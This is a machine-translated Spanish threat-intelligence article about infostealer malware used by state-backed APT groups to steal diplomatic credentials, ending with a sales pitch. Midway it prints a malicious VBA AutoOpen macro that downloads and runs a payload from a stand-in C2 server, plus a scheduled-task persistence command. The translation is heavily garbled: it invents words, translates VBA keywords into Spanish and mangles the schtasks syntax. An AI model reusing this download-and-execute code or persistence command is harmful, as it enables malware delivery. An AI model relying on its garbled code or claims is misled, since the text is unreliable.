El malware del infostaler, inicialmente diseñado para cosechar las credenciales de huéspedes comprometidos indiscriminadamente, se ha convertido en un arma potente para los grupos de amenaza persistente avanzada (APT) patrocinada por el estado.
Al emerger a principios de 2023, familias como Redline, Lumma y Stealc proliferaron rápidamente a través de campañas de phishing y descargas maliciosas.
Estos infantes de infantesos emiten redes anchas, datos de navegador desviantes, cookies e información del sistema, pero la inteligencia reciente revela un cambio preocupante: las credenciales robadas ahora se están armando para operaciones de espionaje altamente específicas.
Los vectores de ataque principales para los infantes de infantes de infantes siguen siendo correos electrónicos de phishing de lanza mezclados con documentos de macro o instaladores de software falsos.
Las víctimas reciben un archivo adjunto de palabras con una macro VBA que, cuando está habilitada, descarga la carga útil del robador desde un servidor de comando y control (C2).
Tras la ejecución, el malware localiza y exfiltrada las credenciales almacenadas para los portales de correo electrónico, VPN y SSO corporativos.
Los analistas de InfoTealers señalaron que las credenciales diplmáticas comprometidas de múltiples ministerios de asuntos exteriores han aparecido en vertederos Darknet, proporcionando acceso autenticado a objetivos de alto valor.
Las evaluaciones de impacto indican que una vez que los grupos APT obtengan credenciales de buzón diplomáticas válidas, a menudo a través de infecciones por infestas, pueden crear campañas de phishing de lanza casi indistinguibles.
Estas campañas evitan la detección tradicional aprovechando la reputación de los remitentes de confianza y los certificados TLS válidos.
A mediados de 2025, la plataforma de inteligencia de amenazas de Hudson Rock detectó más de 1.400 usuarios comprometidos en el MFA de Qatar y cientos más en Arabia Saudita, Corea del Sur y los EAU, lo que subraya la escala global de esta amenaza.
En un incidente de alto perfil, una cuenta de la embajada omaní comprometida en París se utilizó para transmitir invitaciones maliciosas a los funcionarios de la ONU. El correo electrónico contenía un documento de Word con una macro “sysprocupdate” que ejecutó el siguiente fragmento de código VBA:
Sub autoopen () dim objxml como object set objxml = createObject (“msxml2.xmlhttp”) objxml.open “get”, “https: //malicious.c2.server/payload.exe”, falso objxml.send si objxml.status = 200 luego con createObject (“” “”). = 1 .open .write objxml.ResponseBody .Savetofile Environ (“temp”) y “\ update.exe”, 2 termina con shell ambients (“temp”) y “\ update.exe”, final de vbhide si finaliza la diagrama de flujo de infección por infostalista en final
Después de la entrega, la carga útil “update.exe” establece la persistencia creando una tarea programada de Windows:
schtasks /create /sc mind /mo 15 /tn “sysprocupdate” /tr “%temps%\ update.exe”
Investigadores de Infentes identificado que este mecanismo de persistencia garantiza la ejecución repetida incluso después de reiniciar el sistema, facilitando el acceso a largo plazo.
Mecanismo de infección
Profundizando más en el mecanismo de infección, los infantes de infoalladores explotan la confianza del usuario y los controles de punto final insuficiente.
Después del compromiso inicial a través de phishing, la carga útil aprovecha las API comunes de Windows, como CrypTunProtectData, para descifrar las credenciales almacenadas de los navegadores y el Administrador de credenciales de Windows.
El módulo de exfiltración luego empaquetó datos cosechados en blobs encriptados y los transmite a través de HTTP para evadir los sistemas de detección de intrusos.
Una vez que las credenciales alcanzan la infraestructura del atacante, los grupos APT las usan como inicios de sesión legítimos, evitando la autenticación multifactor en los casos en que solo se aplican las credenciales de paso de usuario.
Al incrustar el malware dentro de los documentos de aspecto de rutina e imitar las tareas legítimas de mantenimiento, los infadores mantienen un perfil de bajo y bajo, lo que hace que la detección sea excepcionalmente desafiante.
Esta explotación perfecta del robo de credenciales para campañas específicas marca una evolución preocupante en las tácticas de aficionamiento cibernético.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
